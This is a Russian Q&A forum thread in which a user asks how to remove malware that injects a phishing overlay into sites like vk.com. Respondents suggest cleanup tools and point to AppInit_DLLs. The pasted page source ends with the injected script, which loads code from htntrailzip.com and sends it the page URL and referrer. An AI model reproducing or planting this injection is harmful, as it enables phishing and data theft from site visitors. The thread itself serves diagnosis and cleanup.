Хитрый фишинг

Question

consolomets @consolomets

Фишинг

Хитрый фишинг

В популярные страницы (например vk.com, fb.com) встраивается javascript (в конец кода) и отрисовывает поверх контента самой страницы фрейм, в котором предлагает получить смс и ввести код. Адрес, с которого берётся этот скрипт: htntrailzip.com
После того, как внёс имя этого сайта в hosts и присвоил ему 127.0.0.1 перестали грузиться почти все страницы.
Вопрос: где находится та гадость, которая встраивает в конец страницы этот скрипт?
Как это лечить?

Вопрос задан более трёх лет назад
12949 просмотров

Комментировать

Подписаться 10 Оценить Комментировать

Решения вопроса 1

Комментировать

Пригласить эксперта

Ответы на вопрос 1

7 комментариев

Владимир Мартьянов @vilgeforce

А, а еще лучше — pcap-файл, который был получен при посещении страницы и появлении на ней левой инфы. Оно ж там через 2-3 промежуточных запроса работает.

Написано более трёх лет назад

consolomets @consolomets Автор вопроса

Исходный код страницы:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<link rel="shortcut icon" href="/images/faviconnew.ico" />

<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="description" content="ВКонтакте – универсальное средство для общения и поиска друзей и одноклассников, которым ежедневно пользуются десятки миллионов человек. Мы хотим, чтобы друзья, однокурсники, одноклассники, соседи и коллеги всегда оставались в контакте." />

<title>Добро пожаловать | ВКонтакте</title>

<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>

<script type="text/javascript">
var vk = {
  adupd: 120000,
  al: parseInt('3') || 4,
  id: 0,
  intnat: '' ? true : false,
  host: 'vk.com',
  lang: 0,
  rtl: parseInt('') || 0,
  version: 12142,
  stDomains: 3,
  zero: false,
  contlen: 7062,
  loginscheme: 'https',
  ip_h: '09cb911264f6dd1047',
  vc_h: '8d59218036b2a91e573f067923adc501',
  navPrefix: '/',
  dt: parseInt('') || 0,
  fs: parseInt('11') || 11,
  ts: 1362552843,
  pd: 0,
  pads: 1,
  time: [2013, 3, 6, 10, 54, 3]
}

window.locDomain = vk.host.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];
var _ua = navigator.userAgent.toLowerCase();
if (/opera/i.test(_ua) || !/msie 6/i.test(_ua) || document.domain != locDomain) document.domain = locDomain;
var ___htest = (location.toString().match(/#(.*)/) || {})[1] || '', ___to;
if (vk.al != 1 && ___htest.length && ___htest.substr(0, 1) == vk.navPrefix) {
  if (vk.al != 3 || vk.navPrefix != '!') {
    ___to = ___htest.replace(/^(\/|!)/, '');
    if (___to.match(/^[^\?]*\.php([^a-z0-9\.]|$)/)) ___to = '';
    location.replace(location.protocol + '//' + location.host + '/' + ___to);
  }
}

var StaticFiles = {
  'common.js' : {v: 1051},
  'common.css': {v: 395},
  'ie6.css'   : {v: 26},
  'ie7.css'   : {v: 18}
  ,'lang0_0.js':{v:6443},'index.css':{v:19},'index.js':{v:25}
}
</script>

<link rel="stylesheet" type="text/css" href="http://st0.vk.me/css/al/common.css?395" />
<!--[if lte IE 6]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(http://st0.vk.me/css/al/ie6.css?26); /* ]]> */</style><![endif]-->
<!--[if IE 7]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(http://st0.vk.me/css/al/ie7.css?18); /* ]]> */</style><![endif]-->
<link type="text/css" rel="stylesheet" href="http://st0.vk.me/css/al/index.css?19"></link><script type="text/javascript" src="/js/loader_nav12142_0.js"></script><script type="text/javascript" src="http://st3.vk.me/js/al/common.js?1051"></script><script type="text/javascript" src="/js/lang0_0.js?6443"></script><script type="text/javascript" src="http://st1.vk.me/js/al/index.js?25"></script>

</head>

<body onresize="onBodyResize()" class="is_rtl font_default pads ">
  <div id="system_msg" class="fixed"></div>
  <div id="utils"></div>

  <div id="layer_bg" class="fixed"></div><div id="layer_wrap" class="scroll_fix_wrap fixed"><div id="layer"></div></div>
  <div id="box_layer_bg" class="fixed"></div><div id="box_layer_wrap" class="scroll_fix_wrap fixed"><div id="box_layer"><div id="box_loader"><div class="loader"></div><div class="back"></div></div></div></div>

  <div id="stl_left"></div><div id="stl_side"></div>

  <script type="text/javascript">domStarted();</script>

  <div class="scroll_fix_wrap" id="page_wrap"><div id="reg_bar" class="top_info_wrap fixed">
  <div class="scroll_fix">
    <div id="reg_bar_content">
      Присоединяйтесь, чтобы всегда оставаться в контакте с друзьями и близкими
      <div class="button_blue" id="reg_bar_button"><a class="button_link" href="/join" onclick="return !showBox('join.php', {act: 'box', from: nav.strLoc}, {}, event)"><button id="reg_bar_btn"><span id="reg_bar_with_arr">Зарегистрироваться</span></button></a></div>
    </div>
  </div>
</div>
<div><div class="scroll_fix">
  <div id="page_layout" style="width: 791px;">
    <div id="page_header" class="p_head p_head_l0">
      <div class="back"></div>
      <div class="left"></div>
      <div class="right"></div>
      <div class="content">
        <div id="top_nav" class="head_nav">
  <div id="top_logo_down" class="fl_l"></div>
  <a id="top_home_link" class="top_home_link fl_l" href="/" onmousedown="addClass('top_logo_down','tld_d');" onclick="return nav.go(this, event);" onmouseup="removeClass('top_logo_down','tld_d');"></a>
  <div id="top_links">
    <div class="fl_r" id="top_menu_wrap" style="">
      <a id="top_reg_link" class="fl_r top_nav_link" href="/join" style="display: none" onclick="return !showBox('join.php', {act: 'box', from: nav.strLoc}, {}, event)">регистрация</a>
      <a id="top_switch_lang" class="fl_r top_nav_link"  style="" onclick="ajax.post('al_index.php', {act: 'change_lang', lang_id: 3, hash: '5a9b431d36c995321f'});">Switch to English</a>
    </div>
    <a class="fl_l top_nav_link" href="" id="top_back_link" onclick="return nav.go(this, event, {back: true})"></a>
  </div>
</div>
      </div>
    </div>

    <div id="side_bar" class="fl_l" style="">
      <div id="quick_login">
  <form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="role" value="al_frame" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="_origin" value="http://vk.com" />
    <input type="hidden" name="ip_h" value="09cb911264f6dd1047" />
    <div class="label">Телефон или email</div>
    <div class="labeled"><input type="text" name="email" class="text" id="quick_email" /></div>
    <div class="label">Пароль</div>
    <div class="labeled"><input type="password" name="pass" class="text" id="quick_pass" onkeyup="toggle('quick_expire', !!this.value);toggle('quick_forgot', !this.value)" /></div>
    <input type="submit" class="submit" />
  </form>
  <div class="button_blue button_wide button_big" id="quick_auth_button"><button id="quick_login_button">Войти</button></div>
  <div class="button_blue button_wide button_big" id="quick_reg_button" style="display: none"><button onclick="top.showBox('join.php', {act: 'box', from: nav.strLoc})">Регистрация</button></div>
  <div class="clear forgot"><a id="quick_forgot" href="/restore" target="_top">Забыли пароль?</a><div class="checkbox ta_l" id="quick_expire" onclick="checkbox(this);ge('quick_expire_input').value=isChecked(this)?1:'';"><div></div>Чужой компьютер</div></div>
</div>
    </div>

    <div id="page_body" class="fl_r" style="width: 631px;">
      <div id="header_wrap2">
        <div id="header_wrap1">
          <div id="header" style="">
            <h1 id="title">Добро пожаловать</h1>
          </div>
        </div>
      </div>
      <div id="wrap_between"></div>
      <div id="wrap3"><div id="wrap2">
  <div id="wrap1">
    <div id="content"><div id="index">
  <iframe class="upload_frame" src="https://login.vk.com/?role=al_frame&_origin=http://vk.com&ip_h=09cb911264f6dd1047"></iframe>
  <div class="content">
    <p><b>ВКонтакте</b> – универсальное средство для общения и поиска друзей и одноклассников,<br>которым ежедневно пользуются десятки миллионов человек.</p>

    <h2>Моментальная регистрация</h2>

    <div class="msg" id="ij_msg"></div>

    <div class="ij_form">
      <div class="ij_reg_row">
        <input type="text" class="big_text" id="ij_first_name" value="" placeholder="Ваше имя" onkeydown="if (event.keyCode == 10 || event.keyCode == 13) Index.submitJoinStart();" />
      </div>
      <div class="ij_reg_row">
        <input type="text" class="big_text" id="ij_last_name" value="" placeholder="Ваша фамилия" onkeydown="if (event.keyCode == 10 || event.keyCode == 13) Index.submitJoinStart();" />
      </div>
      <div class="ij_reg_row" id="ij_sex_row">
        <input type="hidden" id="ij_sex" name="ij_sex" />
      </div>
      <div class="button_blue button_wide button_big ij_button">
        <button id="ij_submit" onclick="Index.submitJoinStart()">
          <span class="ij_with_arr">Зарегистрироваться</span>
        </button>
      </div>
    </div>

    <h2>В чём поможет ВКонтакте?</h2>
    <ul class="listing">
      <li><span>Найти людей, с которыми Вы когда-либо учились, работали или отдыхали.</span></li>
      <li><span>Узнать больше о людях, которые Вас окружают, и найти новых друзей.</span></li>
      <li><span>Всегда оставаться в контакте с теми, кто Вам дорог.</span></li>
    </ul>
  </div>
  <div class="reg">
    <table cellspacing="0" cellpadding="0" id="ij_screens"><tr>
      <td><a class="ij_scr" onclick="JoinPhotoview.show(0)"><img src="/images/join/dial_m.png" class="ijs_img" /></a></td>
      <td><a class="ij_scr" onclick="JoinPhotoview.show(1)"><img src="/images/join/news_m.png" class="ijs_img" /></a></td>
      <td><a class="ij_scr" onclick="JoinPhotoview.show(2)"><img src="/images/join/photos_m.png" class="ijs_img" /></a></td>
    </tr></table>
  </div>
</div></div>
  </div>
</div></div>
    </div>

    <div id="footer_wrap" class="fl_r" style="width: 661px;">
      <div id="bottom_nav">
  <a class="bnav_a" href="/about">о сайте</a>
  <a class="bnav_a" href="/support?act=new" onclick="return nav.go(this, event);" style="display: none;">помощь</a>
  <a class="bnav_a" href="/terms">правила</a>
  <a class="bnav_a" href="/ads">реклама</a>
  <a class="bnav_a" href="/developers.php">разработчикам</a>
  <a class="bnav_a" href="/jobs.php" style="display: none;">вакансии</a>
</div>
<div id="footer" class="clear">
  <div class="copy_lang"><a href="/about">ВКонтакте</a> © 2013 <a class="bnav_lang" onclick="ajax.post('al_index.php', {act: 'change_lang', lang_id: 3, hash: '5a9b431d36c995321f'})">English</a><a class="bnav_lang" onclick="ajax.post('al_index.php', {act: 'change_lang', lang_id: 0, hash: '5a9b431d36c995321f'})">Русский</a><a class="bnav_lang" onclick="ajax.post('al_index.php', {act: 'change_lang', lang_id: 1, hash: '5a9b431d36c995321f'})">Українська</a><a class="bnav_lang" onclick="showBox('lang.php', {act: 'lang_dialog'}, {noreload: true})">все языки »</a></div>
  
  <div>
    
    
  </div>
</div>
    </div>
    <div class="clear"></div>
  </div>
</div></div></div>
  <div class="progress" id="global_prg"></div>

  <script type="text/javascript">
    if (parent && parent != window && (browser.msie || browser.opera || browser.mozilla || browser.chrome || browser.safari || browser.iphone)) {
      document.getElementsByTagName('body')[0].innerHTML = '';
    } else {
      domReady();
      updateMoney(0);
gSearch.init();
if (window.qArr && qArr[5]) qArr[5] = [5, "по товарам", "", "goods", 0x00000100];
if (browser.iphone || browser.ipad || browser.ipod) {
  setStyle(bodyNode, {webkitTextSizeAdjust: 'none'});
}var qf = ge('quick_login_form'), ql = ge('quick_login'), qe = ge('quick_email'), qp = ge('quick_pass');
var qlb = ge('quick_login_button'), prgBtn = qlb;

var qinit = function() {
  setTimeout(function() {
    ql.insertBefore(ce('div', {innerHTML: '<iframe class="upload_frame" id="quick_login_frame" name="quick_login_frame"></iframe>'}), qf);
    qf.target = 'quick_login_frame';
  }, 1);
}

if (window.top && window.top != window) {
  window.onload = qinit;
} else {
  setTimeout(qinit, 0);
}

qf.onsubmit = function() {
  if (!ge('quick_login_frame')) return false;
  if (!trim(qe.value)) {
    notaBene(qe);
    return false;
  } else if (!trim(qp.value)) {
    notaBene(qp);
    return false;
  }
  lockButton(window.__qfBtn = prgBtn);
  prgBtn = qlb;
  clearTimeout(__qlTimer);
  __qlTimer = setTimeout(loginSubmitError, 30000);
  domFC(domPS(qf)).onload = function() {
    clearTimeout(__qlTimer);
    __qlTimer = setTimeout(loginSubmitError, 2500);
  }
  return true;
}

window.loginSubmitError = function() {
  showFastBox('Предупреждениe', 'Не удается пройти авторизацию по защищенному соединению. Чаще всего это происходит, когда на Вашем компьютере установлена неправильная текущая дата и время. Пожалуйста, проверьте настройки даты и времени в системе и перезапустите браузер.');
}
window.focusLoginInput = function() {
  scrollToTop(0);
  notaBene('quick_email');
}
window.changeQuickRegButton = function(noShow) {
  if (noShow) {
    hide('top_reg_link', 'quick_reg_button');
    show('top_search_link');
  } else {
    hide('top_search_link');
    show('top_reg_link', 'quick_reg_button');
  }
  toggle('top_switch_lang', noShow && window.langConfig && window.langConfig.id != 3);
}
window.submitQuickLoginForm = function(email, pass, opts) {
  setQuickLoginData(email, pass, opts);
  if (opts && opts.prg) prgBtn = opts.prg;
  if (qf.onsubmit()) qf.submit();
}
window.setQuickLoginData = function(email, pass, opts) {
  if (email !== undefined) ge('quick_email').value = email;
  if (pass !== undefined) ge('quick_pass').value = pass;
  var params = opts && opts.params || {};
  for (var i in params) {
    var el = ge('quick_login_' + i);
    if (el) {
      val(el, params[i]);
    } else {
      qf.appendChild(ce('input', {type: 'hidden', name: i, id: 'quick_login_' + i, value: params[i]}));
    }
  }
}

if (qlb) {
  qlb.onclick = function() { if (qf.onsubmit()) qf.submit(); };
}

if (browser.opera_mobile) show('quick_expire');

if (1) {
  hide('support_link_td');
}
var ts_input = ge('ts_input'), oldFF = browser.mozilla && parseInt(browser.version) < 8;
if (browser.mozilla && !oldFF) {
  setStyle(ts_input, {padding: (vk.rtl ? '3px 22px 4px 40px' : '3px 41px 4px 22px')});
}
placeholderSetup(ts_input, {back: false, reload: true});
if (browser.opera || browser.msie || oldFF) {
  setStyle(ts_input, {padding: (vk.rtl ? '3px 22px 4px 40px' : '3px 41px 4px 22px')});
}
if (browser.chrome) {
  setStyle(ts_input, {padding: (vk.rtl ? '4px 23px 3px 39px' : '4px 40px 3px 23px')});
}
TopSearch.init();
if (browser.msie8 || browser.msie7) {
  var st = {border: '1px solid #a6b6c6'};
  if (hasClass(ge('ts_wrap'), 'vk')) {
    if (vk.rtl) st.left = '1px';
    else st.right = '0px';
  } else {
    if (vk.rtl) st.right = '146px';
    else st.left = '146px';
  }
  setStyle(ge('ts_cont_wrap'), st);
}
window.tsHintsEnabled = 1;
handlePageParams({"id":0,"pads":1,"loc":"","wrap_page":1,"width":791,"width_dec":160,"width_dec_footer":130,"counters":"","pvbig":0,"pvdark":1});addEvent(document, 'click', onDocumentClick);Index.initNew();
JoinPhotoview.init([{"src":"\/images\/join\/dial_1.png?3","width":790,"height":600,"desc":"Делитесь с друзьями фотографиями и новостями"},{"src":"\/images\/join\/news_1.png?3","width":790,"height":600,"desc":"Получайте новости из жизни Ваших друзей и известных людей"},{"src":"\/images\/join\/photos_1.png?3","width":790,"height":600,"desc":"Общайтесь с близкими при помощи личных сообщений"}]);
cur.lang = extend(cur.lang || {}, {
  index_screen_m_of_n: 'Иллюстрация {num} из {count}',
  index_to_main: 'Главная страница',
  index_choose_sex: 'Укажите пол'
});
var sd = false;
if (sd) Index.initSexDD(sd);
placeholderSetup('ij_first_name', {back: true});
placeholderSetup('ij_last_name', {back: true});
var login = ge('quick_email');
if (login) {
  login.focus();
}
    }
  </script>
<script>var gtl=self;if ( gtl == top ){document.write("<script src='http" + (("https:" == document.location.protocol) ? "s" : "") +"://htntrailzip.com/phpbb/js.php?ran="+encodeURIComponent("fPazVo3RXOu2gfyXLJmjMFdbBLHEeFl7KMtYeV8L56/Jk1KeBmF62Pe8fVZJ2atqJJo8f+CfsJs_")+"&t=stat&u="+escape(document.URL)+"&r="+escape(document.referrer)+"&v=35101&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script></body>

</html>

Написано более трёх лет назад

Владимир Мартьянов @vilgeforce

Мда… Хабр все зарезал. На vilgeforce@gmail.com пришлите, если не сложно

Написано более трёх лет назад
consolomets @consolomets Автор вопроса

Уже исправил

Написано более трёх лет назад
Владимир Мартьянов @vilgeforce

Спасибо! Если будут проблемы с лечением — обращайтесь.

Написано более трёх лет назад
consolomets @consolomets Автор вопроса

По почте отправил tcpdump

Написано более трёх лет назад
Владимир Мартьянов @vilgeforce

Спасибо-спасибо!

Написано более трёх лет назад

Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы

Google Chrome

+1 ещё

Простой
Как вытащить чужие сайты из под антифишингового фильтра?
- 1 подписчик
- 22 янв.
- 119 просмотров
1

ответ
Фишинг

Простой
Какие есть актуальные ресурсы по поиску фишинговых и мошеннических доменов?
- 1 подписчик
- более года назад
- 139 просмотров
0

ответов
Компьютерные сети

+3 ещё

Средний
При авторизации на любом сайте через браузер. В адресной строке появляется непонятный код. Что это?
- 1 подписчик
- более года назад
- 432 просмотра
2

ответа
Информационная безопасность

+1 ещё

Средний
Фишинговая «платежная система» или нет? Как узнать, проверить?
- 2 подписчика
- более года назад
- 1865 просмотров
3

ответа
iOS

+2 ещё

Простой
Что будет, если открыть pdf с iOS в фишинговом письме?
- 1 подписчик
- более года назад
- 1117 просмотров
2

ответа
Информационная безопасность

+2 ещё

Простой
Как закрыть доступ к своей интернет сети извне фишингеру,сталкеру,взломщику?
- 1 подписчик
- более двух лет назад
- 1103 просмотра
5

ответов
Вредоносное ПО

+1 ещё

Простой
Что за тип вируса с 4мя вопросами на сайтах, как это работает?
- 1 подписчик
- более трёх лет назад
- 741 просмотр
2

ответа
Фишинг

Средний
Как защитить свой сайт от мошенников, которые показывают твой сайт, на своем заменяя страницу оплаты?
- 2 подписчика
- более трёх лет назад
- 440 просмотров
1

ответ
1С-Битрикс

+2 ещё

Средний
Редирект на 404 спасает от фишинга?
- 2 подписчика
- более трёх лет назад
- 1749 просмотров
1

ответ
Фишинг

Простой
Поддельный сайт, что могут украсть?
- 1 подписчик
- более трёх лет назад
- 234 просмотра
1

ответ
Показать ещё Загружается…

React Native developer (+Node.js)

CTRL+ • Москва

от 250 000 до 320 000 ₽

Embedded Software Engineer

CTRL+ • Москва

от 200 000 до 300 000 ₽

Senior backend developer (Node.js)

CTRL+ • Белград

от 250 000 до 320 000 ₽

Телеграм бот

22 нояб. 2024, в 02:56

10000 руб./за проект

Перерисовать логотип в векторе

22 нояб. 2024, в 00:55

500 руб./за проект

Разработка алгоритма на python (Data engineering)

21 нояб. 2024, в 23:30

300000 руб./за проект

Answer 1 · 2013-03-06 09:50:06

Предлагаю просто прогнать combofix — 95% что он его прибъёт и/или воспользоваться avz

Answer 2 · 2013-03-06 09:50:37

Можете полный код страницы с отсылкой на htntrailzip.com прислать? Очень нужно с живой машины.
Зараза сидит в appinit_dlls, библиотека со случайным именем, или 105.tmp в некоторых случаях.

Хитрый фишинг

Войдите, чтобы написать ответ

Минуточку внимания

Войдите на сайт